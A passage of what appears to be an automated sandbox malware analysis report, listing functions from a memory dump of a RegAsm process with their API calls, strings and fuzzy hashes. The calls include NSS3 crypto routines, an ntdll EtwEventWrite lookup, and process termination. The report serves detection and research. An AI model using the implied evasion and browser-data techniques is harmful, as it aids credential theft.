API String ID: 1907330108-3943720641
Opcode ID: 77f9c640fe414bb0cdc4869c80fa41d813b36e674f288a1e39da98f53bc6529a
Instruction ID: 08c6ec9efed7a5c390ebc5c82bdfeeb61eb1c319f84a4c364d0877d45cdca1b2
Opcode Fuzzy Hash: 77f9c640fe414bb0cdc4869c80fa41d813b36e674f288a1e39da98f53bc6529a
Instruction Fuzzy Hash: 36019235741190EFDF009F55EB49B693BB5AB87369F084025E508D3E11DB34D88DC792

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction ID: 9bbdd1ee4896165f6ac39e3e5efd8c25d27bca58a6bb0b57e2a538c7cae0429d
Opcode Fuzzy Hash: cf640d80628ad4e74f3d38171acba973207c28ae387d92be87cd61cc0b75c439
Instruction Fuzzy Hash: C9D012353C030477E1781B50BC5FF1A2934D7C5F02F201124F312580D046A41402963E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

ntdll.dll, xrefs: 004018B5
EtwEventWrite, xrefs: 004018C5

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction ID: fa0301676ac4a0b35d6f0bad7f9db5a069fcd374a286a1e4a3065c0da922a8bc
Opcode Fuzzy Hash: e7173cbc659f646d90c6637380379b2e67bafee961351022300d75924a4236c6
Instruction Fuzzy Hash: 84B09B7078020097CD1467756D5DF07766566457027506165A645D0160D77C5514551D

Function 6CAA1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAA1D8F

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAA1DA6

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CAA1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAA1ED0

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: 6755c141f86c685711e6005dd91710ea6a126fb33948f4451d90c499a4f8352c
Instruction ID: b09f0302fe4766170086c93b931b5fe9c3368ed6fefe4ef4253ac605e7b10ac3
Opcode Fuzzy Hash: 6755c141f86c685711e6005dd91710ea6a126fb33948f4451d90c499a4f8352c
Instruction Fuzzy Hash: 0D515B75A00309DFDB10CF94C984BBEB7BABF49318F144129EA199B750D731E98ACB90

Function 6CB07DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB07EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB07ED8

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 8fcac8cf118ee477b1812a4268464eb43cb6f00747f91a46f2e684a124917700
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: C53182B2A012518FDB04CF08D89099EFBA6FF8831871A8169D8596B711EB71EC45CBD1

Function 6CA36C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA36C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA36CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA36CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CB58FE0), ref: 6CA36CFE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 5b20023c01318f30f690ce7b53bb4f9c548349a485264343a6dcba919d926cdd
Instruction ID: 8ea3b086b50a023d28472eaab8e405cdb0846b0bde1ceca57a559e05b39896f3
Opcode Fuzzy Hash: 5b20023c01318f30f690ce7b53bb4f9c548349a485264343a6dcba919d926cdd
Instruction Fuzzy Hash: 5F3181B5A002169FDB04CF65C891ABFBBF5FF89248B14442DD909D7700EB319955CBA0

Function 0041BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BDC5
_memmove.LIBCMT ref: 0041BDD9
_memmove.LIBCMT ref: 0041BE26
WriteFile.KERNEL32(00000000,?,66F5B81D,?,00000000,01102590,?,00000001,01102590,?,0041AE6B,?,00000001,01102590,66F5B81D,?), ref: 0041BE45

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98

Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004122D7

Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
CloseHandle.KERNEL32(00000000), ref: 00412392

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction ID: d389cef70183d5cd616f040657d4303a3a928023e9a5c5ea90d08b3fb0bb435f
Opcode Fuzzy Hash: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction Fuzzy Hash: 6B314D72A0121CAFDF20DF61DD849EEB7BDEB0A345F0400AAF909E2550D6399F848F56

Function 6CAA6DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CAA6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAA6E57

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CAA6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CAA6EAA

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID:
API String ID: 3163584228-0
Opcode ID: 26e1851ec75aa23ba975e14ad7fc0cd037edbb034d293b37b7c22af1ede148a5
Instruction ID: 4613018e054a0f5afbf93d0b1d6d4a7b57d672557a431a3531e32b72630b4859
Opcode Fuzzy Hash: 26e1851ec75aa23ba975e14ad7fc0cd037edbb034d293b37b7c22af1ede148a5
Instruction Fuzzy Hash: 9F31C332610512EEDB241EB8DE04396B7B5AB0531AF14063DD4A9D7B90EB3165DACF82

Function 6CA8DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CA8DDB1,?,00000000), ref: 6CA8DDF4

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CA8DDB1,?,00000000), ref: 6CA8DE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CA8DDB1,?,00000000), ref: 6CA8DE17

Part of subcall function 6CA90BE0: malloc.MOZGLUE(6CA88D2D,?,00000000,?), ref: 6CA90BF8
Part of subcall function 6CA90BE0: TlsGetValue.KERNEL32(6CA88D2D,?,00000000,?), ref: 6CA90C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CA8DE80

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 755ad1894f0f57340f9c2af55bcf8bf2aa2df7e381942d94093c45f032a81804
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 0C31A4B1D027439BE700CF16D980662B7F4BFA5318B24822ED95987B01EB71F5E4CB90

Function 6CA7FE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CA55ADC,?,00000000,00000001,?,?,00000000,?,6CA4BA55,?,?), ref: 6CA7FE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA7FE5F
PR_Unlock.NSS3(78831D74), ref: 6CA7FEC2
PR_SetError.NSS3(00000000,00000000), ref: 6CA7FED6

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 5cafa78e11aad1e1308b4937502d30964dc3674fde7f7c7fad4bf6739b2dd592
Instruction ID: a39508b8263e49d1c401b43cfa52bf213423d53d0466d7b1cb81772b7e9c0af5
Opcode Fuzzy Hash: 5cafa78e11aad1e1308b4937502d30964dc3674fde7f7c7fad4bf6739b2dd592
Instruction Fuzzy Hash: 8B210435E01615ABD720AE64DD44B9A73B8BF05358F480128ED0567A42E730EAA8CBE0

Function 6CA31EC0 Relevance: 6.1, APIs: 4, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CA34C64,?,-00000004), ref: 6CA31EE2

Part of subcall function 6CA91820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CA31D97,?,?), ref: 6CA91836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CA34C64,?,-00000004), ref: 6CA31F13
DER_DecodeTimeChoice_Util.NSS3(?,6CA34CA0,?,?,?,?,?,?,00000000,00000000,?,6CA34C64,?,-00000004), ref: 6CA31F37
DER_DecodeTimeChoice_Util.NSS3(?,6CA34C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA34C64,?,-00000004), ref: 6CA31F53

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID:
API String ID: 3216063065-0
Opcode ID: f64f17cc74cacdf35793f206cbd0f691f614838129e5a69948a04c1a28430c7f
Instruction ID: 0b884983216b0d738e6aa9cad673a20683ea1f9685c805f7a30cd580349b45f6
Opcode Fuzzy Hash: f64f17cc74cacdf35793f206cbd0f691f614838129e5a69948a04c1a28430c7f
Instruction Fuzzy Hash: 3F21D471514316AFC700CE29DD01ABBB7F9AB94299F04492EEA48C3A40F331E58DCBD2

Function 0041665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 004166A7
lstrcatA.KERNEL32(?,00436B4C), ref: 004166C4
lstrcatA.KERNEL32(?), ref: 004166D7
lstrcatA.KERNEL32(?,00436B50), ref: 004166E9

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
